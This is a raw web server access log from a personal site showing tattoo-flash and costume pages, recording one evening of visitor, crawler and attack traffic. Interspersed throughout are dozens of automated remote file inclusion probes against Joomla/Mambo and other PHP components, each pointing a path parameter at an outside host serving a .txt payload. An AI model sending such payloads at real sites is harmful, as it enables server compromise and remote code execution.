68.46.207.163 - - [11/Jun/2008:20:32:13 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:13 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:13 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:22 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:22 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:22 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:22 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.84.182.98 - - [11/Jun/2008:20:34:54 -0500] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/sobatmu/echo.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.810"
70.84.182.98 - - [11/Jun/2008:20:34:54 -0500] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/sobatmu/echo.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.810"
207.58.171.40 - - [11/Jun/2008:20:36:53 -0500] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.donchaos.com/components/com_zoom/classes/iptc/makernotes/echo.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.811"
207.58.171.40 - - [11/Jun/2008:20:36:53 -0500] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.donchaos.com/components/com_zoom/classes/iptc/makernotes/echo.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.811"
87.106.209.176 - - [11/Jun/2008:20:40:33 -0500] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.donchaos.com/components/com_zoom/classes/iptc/makernotes/echo.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
87.106.209.176 - - [11/Jun/2008:20:40:34 -0500] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.donchaos.com/components/com_zoom/classes/iptc/makernotes/echo.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
206.75.164.235 - - [11/Jun/2008:20:41:24 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://images.google.ca/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&h=364&w=405&sz=67&hl=en&start=27&um=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Btattoo%2Bflash%26start%3D18%26ndsp%3D18%26um%3D1%26hl%3Den%26safe%3Doff%26sa%3DN""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
206.75.164.235 - - [11/Jun/2008:20:41:24 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
206.75.164.235 - - [11/Jun/2008:20:41:24 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
206.75.164.235 - - [11/Jun/2008:20:41:24 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
206.75.164.235 - - [11/Jun/2008:20:41:25 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
206.75.164.235 - - [11/Jun/2008:20:41:25 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
206.75.164.235 - - [11/Jun/2008:20:41:52 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
206.75.164.235 - - [11/Jun/2008:20:41:52 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
206.75.164.235 - - [11/Jun/2008:20:41:52 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
206.75.164.235 - - [11/Jun/2008:20:41:52 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
206.75.164.235 - - [11/Jun/2008:20:41:52 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
206.75.164.235 - - [11/Jun/2008:20:41:52 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
206.75.164.235 - - [11/Jun/2008:20:41:52 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
206.75.164.235 - - [11/Jun/2008:20:41:52 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
206.75.164.235 - - [11/Jun/2008:20:41:52 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
65.55.208.119 - - [11/Jun/2008:20:47:56 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [11/Jun/2008:20:47:57 -0500] "GET /logs/?D=A HTTP/1.1" 200 87185 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [11/Jun/2008:20:53:33 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [11/Jun/2008:20:53:33 -0500] "GET /logs/access_log.1178323200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [11/Jun/2008:20:53:33 -0500] "GET /logs/access_log.1159574400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [11/Jun/2008:20:53:33 -0500] "GET /logs/access_log.1173484800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
216.127.70.91 - - [11/Jun/2008:21:02:57 -0500] "GET /logs//components/com_mambowiki/MamboLogin.php?IP=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
216.127.70.91 - - [11/Jun/2008:21:02:57 -0500] "GET //components/com_mambowiki/MamboLogin.php?IP=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
66.36.231.160 - - [11/Jun/2008:21:03:36 -0500] "GET /logs//components/com_mambowiki/MamboLogin.php?IP=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.65"
66.36.231.160 - - [11/Jun/2008:21:03:37 -0500] "GET //components/com_mambowiki/MamboLogin.php?IP=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.65"
62.2.100.138 - - [11/Jun/2008:21:05:33 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
62.2.100.138 - - [11/Jun/2008:21:05:34 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
71.102.211.41 - - [11/Jun/2008:21:33:07 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "http://search.msn.com/results.aspx?q=Vintage+Tattoos&FORM=QSRE2""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0)"
71.102.211.41 - - [11/Jun/2008:21:33:09 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0)"
71.102.211.41 - - [11/Jun/2008:21:33:09 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0)"
72.55.153.109 - - [11/Jun/2008:21:39:47 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
72.55.153.109 - - [11/Jun/2008:21:39:47 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
80.238.93.32 - - [11/Jun/2008:21:44:35 -0500] "GET /logs/newspublish/samplenewspublish.php?path[docroot]=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
80.238.93.32 - - [11/Jun/2008:21:44:35 -0500] "GET /logs//include.php?path%5Bdocroot%5D=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
80.238.93.32 - - [11/Jun/2008:21:44:35 -0500] "GET /newspublish/samplenewspublish.php?path[docroot]=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
80.238.93.32 - - [11/Jun/2008:21:44:35 -0500] "GET //include.php?path%5Bdocroot%5D=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
216.127.70.91 - - [11/Jun/2008:21:45:26 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
216.127.70.91 - - [11/Jun/2008:21:45:26 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
69.72.144.18 - - [11/Jun/2008:21:46:44 -0500] "GET /logs//components/com_mambowiki/MamboLogin.php?IP=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.810"
69.72.144.18 - - [11/Jun/2008:21:46:44 -0500] "GET //components/com_mambowiki/MamboLogin.php?IP=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.810"
80.238.93.32 - - [11/Jun/2008:21:50:32 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
80.238.93.32 - - [11/Jun/2008:21:50:32 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
87.106.98.71 - - [11/Jun/2008:22:01:58 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
87.106.98.71 - - [11/Jun/2008:22:01:58 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
206.174.16.79 - - [11/Jun/2008:22:05:55 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
206.174.16.79 - - [11/Jun/2008:22:05:56 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
206.174.16.79 - - [11/Jun/2008:22:05:56 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
206.174.16.79 - - [11/Jun/2008:22:05:56 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
206.174.16.79 - - [11/Jun/2008:22:05:57 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
206.174.16.79 - - [11/Jun/2008:22:05:57 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
206.174.16.79 - - [11/Jun/2008:22:06:21 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
206.174.16.79 - - [11/Jun/2008:22:06:22 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
206.174.16.79 - - [11/Jun/2008:22:06:27 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
67.15.12.3 - - [11/Jun/2008:22:07:35 -0500] "GET /oneadmin//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
80.238.93.32 - - [11/Jun/2008:22:08:33 -0500] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
80.238.93.32 - - [11/Jun/2008:22:08:34 -0500] "GET //myfunctions/mygallerybrowser.php?myPath=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
87.106.101.24 - - [11/Jun/2008:22:12:08 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
87.106.101.24 - - [11/Jun/2008:22:12:08 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
67.15.12.3 - - [11/Jun/2008:22:13:29 -0500] "GET /oneadmin//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
67.15.12.3 - - [11/Jun/2008:22:14:51 -0500] "GET /oneadmin//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
64.38.46.234 - - [11/Jun/2008:22:21:43 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/indobokep/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
64.38.46.234 - - [11/Jun/2008:22:21:43 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/indobokep/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
67.15.12.3 - - [11/Jun/2008:22:22:59 -0500] "GET /logs/access_log.1208649600/oneadmin//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.811"
67.15.12.3 - - [11/Jun/2008:22:22:59 -0500] "GET /logs/oneadmin//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.811"
64.38.46.234 - - [11/Jun/2008:22:25:22 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
64.38.46.234 - - [11/Jun/2008:22:25:22 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
64.38.46.234 - - [11/Jun/2008:22:25:22 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.archfuck.ru/administrator/components/com_remository/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
64.38.46.234 - - [11/Jun/2008:22:25:22 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.archfuck.ru/administrator/components/com_remository/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
67.15.12.3 - - [11/Jun/2008:22:28:34 -0500] "GET /logs/access_log.1208649600/oneadmin//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.811"
67.15.12.3 - - [11/Jun/2008:22:28:34 -0500] "GET /logs/oneadmin//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.811"
67.15.12.3 - - [11/Jun/2008:22:30:58 -0500] "GET /logs/access_log.1208649600/oneadmin//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.811"
67.15.12.3 - - [11/Jun/2008:22:30:58 -0500] "GET /logs/oneadmin//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.811"
72.46.131.186 - - [11/Jun/2008:22:31:49 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
72.46.131.186 - - [11/Jun/2008:22:31:49 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
72.249.108.180 - - [11/Jun/2008:22:33:40 -0500] "GET /logs/oneadmin//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.810"
72.249.108.180 - - [11/Jun/2008:22:33:40 -0500] "GET /oneadmin//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
64.38.46.234 - - [11/Jun/2008:22:35:46 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 325 "-""libwww-perl/5.810"
64.38.46.234 - - [11/Jun/2008:22:35:47 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 320 "-""libwww-perl/5.810"
216.158.1.202 - - [11/Jun/2008:22:39:40 -0500] "GET /artwork/ HTTP/1.0" 200 11078 "-""bot/1.0 (bot; http://; bot@bot.bot)"
190.54.28.163 - - [11/Jun/2008:22:46:57 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
190.54.28.163 - - [11/Jun/2008:22:47:03 -0500] "GET //skin/zero_vote/error.php?dir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
201.24.2.220 - - [11/Jun/2008:22:47:28 -0500] "GET /logs//components/com_mambowiki/MamboLogin.php?IP=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.808"
201.24.2.220 - - [11/Jun/2008:22:47:29 -0500] "GET //components/com_mambowiki/MamboLogin.php?IP=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.808"
202.88.245.137 - - [11/Jun/2008:22:49:39 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.88.245.137 - - [11/Jun/2008:22:49:44 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.88.245.137 - - [11/Jun/2008:22:49:46 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.88.245.137 - - [11/Jun/2008:22:49:53 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.88.245.137 - - [11/Jun/2008:22:50:08 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3799 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.88.245.137 - - [11/Jun/2008:22:50:11 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.88.245.137 - - [11/Jun/2008:22:50:26 -0500] "GET /costume/costm2.jpg HTTP/1.1" 200 36199 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
216.127.70.91 - - [11/Jun/2008:22:50:32 -0500] "GET /logs/////////?mosConfig_absolute_path=http://user164.helloweb.eu/idilegal.txt??? HTTP/1.1" 200 87197 "-""libwww-perl/5.79"
216.127.70.91 - - [11/Jun/2008:22:50:32 -0500] "GET /////////?mosConfig_absolute_path=http://user164.helloweb.eu/idilegal.txt??? HTTP/1.1" 200 1250 "-""libwww-perl/5.79"
202.88.245.137 - - [11/Jun/2008:22:51:09 -0500] "GET /costume/costm5.jpg HTTP/1.1" 200 36546 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.88.245.137 - - [11/Jun/2008:22:51:23 -0500] "GET /costume/costm1.jpg HTTP/1.1" 200 59753 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.88.245.137 - - [11/Jun/2008:22:51:29 -0500] "GET /costume/costm3.jpg HTTP/1.1" 200 39529 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.88.245.137 - - [11/Jun/2008:22:51:46 -0500] "GET /costume/costm8.jpg HTTP/1.1" 200 35448 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.88.245.137 - - [11/Jun/2008:22:52:03 -0500] "GET /costume/costm7.jpg HTTP/1.1" 200 35141 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.88.245.137 - - [11/Jun/2008:22:52:27 -0500] "GET /costume/costm11.jpg HTTP/1.1" 200 37363 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
75.65.226.206 - - [11/Jun/2008:22:52:42 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
202.88.245.137 - - [11/Jun/2008:22:52:53 -0500] "GET /costume/costm9.jpg HTTP/1.1" 200 38021 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.88.245.137 - - [11/Jun/2008:22:52:58 -0500] "GET /costume/costm4.jpg HTTP/1.1" 200 36814 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.88.245.137 - - [11/Jun/2008:22:53:02 -0500] "GET /costume/costm10.jpg HTTP/1.1" 200 60187 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
216.127.70.91 - - [11/Jun/2008:22:53:07 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://user164.helloweb.eu/idilegal.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
